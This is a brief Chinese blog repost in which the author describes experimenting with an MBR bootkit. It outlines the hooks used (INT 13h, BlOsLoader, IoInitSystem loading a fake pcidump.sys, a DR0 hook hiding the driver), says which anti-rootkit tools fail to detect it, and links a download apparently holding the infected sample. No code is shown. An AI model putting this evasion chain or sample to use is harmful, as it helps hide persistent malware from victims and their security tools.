前两天玩了一下mbr

来源:互联网 发布:js复合防水材料 编辑:程序博客网 时间:2024/05/17 01:21

还挺有意思……


hook int 13 , hook BlOsLoader,call hook IoInitSystem - > load fake pcidump.sys

dr0 hook AtapiDeviceInternalDispatch,隐藏驱动,伪造系统线程

XT看不到什么东西,PowerTool可以检测到调试函数被钩,强力检测可以检测到mbr被感染。不想和PT去对抗了……体力活

http://115.com/file/dpudryrp#mbrInfected.zip